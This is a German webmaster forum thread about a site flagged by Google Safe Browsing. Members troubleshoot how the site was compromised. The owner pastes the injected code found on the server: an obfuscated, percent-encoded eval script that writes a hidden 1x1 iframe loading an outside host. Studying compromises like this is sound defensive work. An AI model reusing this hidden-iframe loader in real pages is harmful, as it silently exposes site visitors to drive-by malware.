Diese Website kann Ihren Computer beschädigen

Ottoman

Well-Known Member
Meine Seite wird nun als gefährlich eingestuft. Hatte jemand bereits dieses Vergnügen?


Safe Browsing
Diagnoseseite

Wie ist die gegenwärtige Einstufung?

Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 2 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Bei 2 Seite(n) von insgesamt 2 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am xx und verdächtiger Content wurde auf dieser Website zuletzt am xx gefunden.

Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Die Malware wird in 1 Domain(s) gehostet, darunter huffdt.com/.

This site was hosted on 1 network(s) including xx.

Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

In den letzten 90 Tagen hat xx anscheinend nicht als Überträger für die Infektion von Websites fungiert.

Hat diese Website Malware gehostet?

Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Wie kam es zu dieser Einstufung?

Gelegentlich wird von Dritten bösartiger Code in legitime Websites eingefügt. In diesem Fall wird unsere Warnmeldung angezeigt.

Nächste Schritte:

* Zur vorherigen Seite zurückkehren.
* Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.
 

turkish talk

Well-Known Member
AW: Diese Website kann Ihren Computer beschädigen

Seite erstmal vom Netz nehmen und den Server untersuchen.
Vielleicht hat jemand ein veraltetes Skript missbraucht. Verwendest Du ein irgendein CM-System? Wordpress, Joomla oder TYPO3, irgendwas in der Richtung?
 

Ottoman

Well-Known Member
AW: Diese Website kann Ihren Computer beschädigen

Seite erstmal vom Netz nehmen und den Server untersuchen.
Vielleicht hat jemand ein veraltetes Skript missbraucht. Verwendest Du ein irgendein CM-System? Wordpress, Joomla oder TYPO3, irgendwas in der Richtung?

Ich habe erst einmal alles vom Server entfernt und anschließend neu aufgespielt. Erst kürzlich hat mir jemand einen Linktausch angeboten, auf das ich nicht eingeganngen bin. Ob er/ sie dahinter steckt...
Nein, ich benutze kein CM-System, zumindest nicht auf der Einstiegsseite. Der Rest gehört nicht mir.
 

turkish talk

Well-Known Member
AW: Diese Website kann Ihren Computer beschädigen

Ich habe erst einmal alles vom Server entfernt und anschließend neu aufgespielt.

Was hast Du gelöscht, was hast Du neu aufgespielt?


Erst kürzlich hat mir jemand einen Linktausch angeboten, auf das ich nicht eingeganngen bin. Ob er/ sie dahinter steckt...

Unwahrscheinlich.

Nein, ich benutze kein CM-System, zumindest nicht auf der Einstiegsseite. Der Rest gehört nicht mir.

Alles statische HTML-Seiten? Wenn CM-System, welches setzt Du ein in welcher Version? Ist das ein dedizierter Server oder hast Du "nur" Webspace bei jemanden gemietet? Vielleicht liegt die Sicherheitslücke auf einer anderen Ebene des Servers, da kannst Du natürlich noch so oft alles neu aufsetzen, ändern wird sich daran nichts. Weitere Fragen wären: Welches Betriebssystem hat der Server? Sind alle Passwörter (FTP, SSH) geändert? Und so weiter und so fort ...
 

Ottoman

Well-Known Member
AW: Diese Website kann Ihren Computer beschädigen

Was hast Du gelöscht, was hast Du neu aufgespielt?

Das ganze Verzeichnis.

Alles statische HTML-Seiten? Wenn CM-System, welches setzt Du ein in welcher Version? Ist das ein dedizierter Server oder hast Du "nur" Webspace bei jemanden gemietet? Vielleicht liegt die Sicherheitslücke auf einer anderen Ebene des Servers, da kannst Du natürlich noch so oft alles neu aufsetzen, ändern wird sich daran nichts. Weitere Fragen wären: Welches Betriebssystem hat der Server? Sind alle Passwörter (FTP, SSH) geändert? Und so weiter und so fort ...

Die Einstiegsseite ist eine triviale statische HTML-Seite. Es ist nur ein Websapce. Zum Glück ist es eine wenig wichtige Seite. Da fällt mir ein, ich habe ja noch ein paar andere. Da sollte ich mal drüber schauen. Ich werde mich mal morgen genauer damit befassen. Mich interessiert in erster Linie was da passiert ist. Es gibt da einen Unterschied zwischen der lokalen Datei und der Datei (index-Seite) auf dem Server. Das ist der unterste Abschnitt:

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6B%6A%64%71%65%69%6E%2E%63%6F%6D%2F%3F%31%37%34%39%32%36%36%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->


Aber da steht auch nichts außer: document.write('')
 

turkish talk

Well-Known Member
AW: Diese Website kann Ihren Computer beschädigen

Die Einstiegsseite ist eine triviale statische HTML-Seite. ... Es ist nur ein Websapce.


Ist trotzdem bedenklich. Ich würde die Zugriffsrechte der Dateien untersuchen. Dazu kannst Du ein FTP-Programm (z.B.: Filezilla) nehmen und nachsehen: Rechter Mausklick auf die index- oder betroffene Seite. Erscheint etwas mit 777 (rwx), ändern auf 755.
777 bedeutet, dass jeder mit der Datei machen kann, was er will. Weitere Infos.

Ich werde mich mal morgen genauer damit befassen.


Und in der Zwischenzeit die Seite auf dem Server mit der sauberen lokalen Datei ersetzen. Du willst doch Deinen Besuchern keine infizierten Seiten anbieten.



Aber da steht auch nichts außer: document.write('')

Das reicht :-D
 

Ottoman

Well-Known Member
AW: Diese Website kann Ihren Computer beschädigen

<script>document.write('');
</script><!-- uy7gdr5332rkmn -->


Was soll das den böses machen :confused:

<!-- uy7gdr5332rkmn --> Sagt Dir das etwas?
 
Top